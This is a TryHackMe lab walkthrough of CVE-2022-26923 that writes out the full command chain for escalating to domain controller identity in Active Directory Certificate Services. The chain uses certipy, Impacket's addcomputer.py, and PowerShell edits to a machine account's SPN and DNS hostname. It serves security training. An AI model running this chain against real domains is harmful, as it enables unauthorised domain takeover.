Hello!
Today we'll be covering up CVE-2022-26923.
CVSS v3
Base score: 8.8
Vector: CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Severity: High
Welcome to CVE-2022-26923 TryHackMe walkthrough. Today I decided to learn about Active Directory Certificate Service and I consider that this walkthorugh was a great occasion. I discovered certipy and practiced on nmap and Impacket's
addcomputer.py.
🔗 Link to the walkthorugh: https://tryhackme.com/r/room/cve202226923
🟡 Difficulty: Easy
⚙️ Tools:
💭 Note: $Target_IP= machine IP
Certain screenshots were intentionally omitted. I really encourage you to drop a comment shall you need support or just to say print("Hello world")
. 😄
On my GitHub you'll find more info about Microsoft ADCS.
🪜 Steps I followed (after deploying the machine:
Add the DNS name and the machine IP in /etc/hosts
Run an nmap scan
nmap -A -Pn $Target_IP
Ports 88 and 389 are open.
-88 is used for Kerberos authentication system
-389 is for making LDAP connections so users can access protected network resources. Connections made through this port are unencrypted.
Get the Enterprise CA name
certipy find -u thm@lunar.eruca.com -p Password1@ -dc-ip $Target_IP
Test certificate generation
certipy req -username thm@lunar.eruca.com -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP
Verify that this certificate is valid and can be used for Kerberos authentication
certipy auth -pfx thm.pfx
Add a Computer to the Domain
python3 addcomputer.py 'lunar.eruca.com/thm:Password1@' -method LDAPS -computer-name 'THMPC' -computer-pass 'Password1@' -dc-ip $Target_IP
Generate a certificate for the newly created computer
certipy req -username THMPC$ -password Password1@ -ca LUNAR-LUNDC-CA -target $Target_IP -template Machine
Verify that the certificate is valid
certipy auth -pfx thmpc.pfx
SSH into the machine
ssh lunar.eruca.com\\thm@lundc
Start Powershell
powershell
Get the current attributes from our Computer AD Object
Get-ADComputer THMPC -properties dnshostname,serviceprincipalname
Update the DNS hostname attribute to that of the DC
Set-ADComputer THMPC -ServicePrincipalName @{}
Set the DNS hostname attribute to that of the DC
Set-ADComputer THMPC -DnsHostName LUNDC.lunar.eruca.com
Verify that the changes were made
Get-ADComputer THMPC -properties dnshostname,serviceprincipalname
Forge a malicious certificate:
- Request a new certificate
certipy req -username THMPC$ -password Password1@ -ca LUNAR-LUNDC-CA -target lundc.lunar.eruca.com -template Machine
- Verify the certificate
certipy auth -pfx lundc.pfx
And we have the flag!
Top comments (0)